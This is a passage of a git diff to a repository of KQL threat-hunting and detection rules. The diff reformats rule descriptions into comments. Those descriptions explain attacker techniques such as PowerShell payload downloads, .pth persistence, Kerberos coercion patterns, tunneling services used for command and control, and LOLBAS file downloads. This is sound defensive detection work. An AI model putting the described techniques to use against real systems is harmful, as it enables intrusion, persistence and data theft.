+// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. +// Use this rule as a basis for hunting for anomalies. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql index daf9a923..d9acc39b 100644 --- a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql +++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql @@ -3,8 +3,7 @@ // Date: 2024-07-23 // Level: informational // Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. -This indicates it may be related to BOINC software and can be used maliciously if unauthorized. - +// This indicates it may be related to BOINC software and can be used maliciously if unauthorized. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql index c99aef84..3e07858a 100644 --- a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql +++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql @@ -3,10 +3,9 @@ // Date: 2024-08-22 // Level: low // Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. -Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. -Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". -The typical use case of the "set /p=" command is to prompt the user for input. - +// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. +// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". +// The typical use case of the "set /p=" command is to prompt the user for input. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql index 18ae2197..7c0ea58c 100644 --- a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql +++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql @@ -3,8 +3,7 @@ // Date: 2022-04-26 // Level: medium // Description: Detects potentially suspicious child processes spawned by PowerShell. -Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. - +// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql index 5a76cf68..24fde261 100644 --- a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql +++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql @@ -3,9 +3,8 @@ // Date: 2025-06-13 // Level: low // Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. -Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. -Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. - +// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. +// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. // MITRE Tactic: Execution // Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql index dbe576c6..c346f388 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql @@ -3,9 +3,8 @@ // Date: 2024-04-25 // Level: medium // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). - +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.006, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql index 041a8a59..55513269 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql @@ -3,9 +3,8 @@ // Date: 2024-04-25 // Level: medium // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). - +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.006, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql index 911fbaca..d8ddfda8 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql @@ -3,9 +3,8 @@ // Date: 2024-04-25 // Level: medium // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). - +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.006, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql index cf92648b..30ba515f 100644 --- a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql @@ -3,7 +3,6 @@ // Date: 2024-08-03 // Level: medium // Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions. - // MITRE Tactic: Execution // Tags: attack.execution, attack.persistence, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql index d6bf6ad6..41a2ea1a 100644 --- a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql @@ -3,8 +3,7 @@ // Date: 2024-02-23 // Level: medium // Description: Detects remote binary or command execution via the ScreenConnect Service. -Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect - +// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect // MITRE Tactic: Execution // Tags: attack.execution, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql index c267b4c7..13e8da72 100644 --- a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql @@ -3,8 +3,7 @@ // Date: 2022-02-23 // Level: medium // Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. -Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. - +// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. // MITRE Tactic: Execution // Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql index ef3542a6..86e6b006 100644 --- a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql +++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql @@ -3,8 +3,7 @@ // Date: 2022-10-13 // Level: medium // Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. -This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) - +// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql index c86edd2e..3839d209 100644 --- a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql +++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql @@ -3,8 +3,7 @@ // Date: 2021-12-26 // Level: low // Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. -Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. - +// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1489, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql index ff89e930..b8755fb6 100644 --- a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql +++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql @@ -3,7 +3,6 @@ // Date: 2019-01-16 // Level: medium // Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1505.003, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql index 5814347e..acba7761 100644 --- a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql +++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql @@ -3,9 +3,8 @@ // Date: 2024-09-02 // Level: low // Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. -The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. -Investigation of the loading application and its behavior is required to determining if its malicious. - +// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. +// Investigation of the loading application and its behavior is required to determining if its malicious. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql index 89247aee..665416c7 100644 --- a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql +++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql @@ -3,7 +3,6 @@ // Date: 2023-11-23 // Level: medium // Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql index 48f96a88..af43a994 100644 --- a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql +++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql @@ -3,13 +3,12 @@ // Date: 2025-06-20 // Level: high // Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. -The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. -Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. -It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records -to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. -If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, -or checking for the presence of such records through the `nslookup` command. - +// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. +// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. +// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records +// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. +// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, +// or checking for the presence of such records through the `nslookup` command. // MITRE Tactic: Collection // Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187 diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql index 62d56887..58ea181f 100644 --- a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql +++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql @@ -3,8 +3,7 @@ // Date: 2021-10-15 // Level: low // Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. -Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. - +// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1115 // False Positives: diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql index 8bbba7e0..0054ce84 100644 --- a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql +++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-12-19 // Level: low // Description: Detects execution of "tar.exe" in order to create a compressed file. -Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - +// Adversaries may abuse various utilities to compress or encrypt data before exfiltration. // MITRE Tactic: Collection // Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 // False Positives: diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql index eb7cef68..64801bdb 100644 --- a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql +++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-12-19 // Level: low // Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - +// Adversaries may abuse various utilities in order to decompress data to avoid detection. // MITRE Tactic: Collection // Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 // False Positives: diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql index a5bf0696..2527fbd7 100644 --- a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql +++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql @@ -3,8 +3,7 @@ // Date: 2021-07-20 // Level: medium // Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. -An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. - +// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1074.001 diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql index f6041c74..f7b1c794 100644 --- a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql +++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql @@ -3,8 +3,7 @@ // Date: 2024-07-01 // Level: medium // Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. -Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". - +// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". // MITRE Tactic: Collection // Tags: attack.collection, attack.t1113 // False Positives: diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql index 755a8f4f..03288f4b 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql @@ -3,9 +3,8 @@ // Date: 2024-06-02 // Level: medium // Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1113 // False Positives: diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql index 8ee5e5af..6bbdf733 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql @@ -3,9 +3,8 @@ // Date: 2024-06-02 // Level: medium // Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1113 // False Positives: diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql index 56b912eb..fc2d0243 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql @@ -3,10 +3,9 @@ // Date: 2024-06-02 // Level: medium // Description: Detects the enabling of the Windows Recall feature via registry manipulation. -Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - +// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1113 // False Positives: diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql index 11daf9c7..1cfde36a 100644 --- a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql +++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql @@ -3,9 +3,8 @@ // Date: 2022-02-11 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql index 7328340e..f1e0969e 100644 --- a/KQL/rules/Command and Control/cloudflared_portable_execution.kql +++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql @@ -3,7 +3,6 @@ // Date: 2023-12-20 // Level: medium // Description: Detects the execution of the "cloudflared" binary from a non standard location. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1090.001 // False Positives: diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql index ee525a83..b41427df 100644 --- a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql +++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql @@ -3,9 +3,8 @@ // Date: 2023-12-20 // Level: medium // Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. -The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. -The tool has been observed in use by threat groups including Akira ransomware. - +// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. +// The tool has been observed in use by threat groups including Akira ransomware. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1090.001 // False Positives: diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql index b19e54ae..fc272418 100644 --- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql @@ -3,9 +3,8 @@ // Date: 2024-06-17 // Level: high // Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. -LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. -Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. - +// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 // False Positives: diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql index b77e3af2..30f7151d 100644 --- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql @@ -3,9 +3,8 @@ // Date: 2024-06-17 // Level: high // Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. -LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. -Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. - +// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 // False Positives: diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql index 965cbed0..4094dc43 100644 --- a/KQL/rules/Command and Control/finger_exe_execution.kql +++ b/KQL/rules/Command and Control/finger_exe_execution.kql @@ -3,9 +3,8 @@ // Date: 2021-02-24 // Level: high // Description: Detects execution of the "finger.exe" utility. -Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. -Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. - +// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. +// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql index d0e6c8ac..a55fccd8 100644 --- a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql +++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql @@ -3,9 +3,8 @@ // Date: 2022-02-13 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql index c4890547..8e81c6be 100644 --- a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql +++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-09-02 // Level: medium // Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql index ed761e87..612c4319 100644 --- a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql +++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql @@ -3,7 +3,6 @@ // Date: 2022-08-28 // Level: medium // Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql index 7ba54289..e4b55399 100644 --- a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql +++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql @@ -3,8 +3,7 @@ // Date: 2022-05-28 // Level: high // Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any -anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json - +// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and 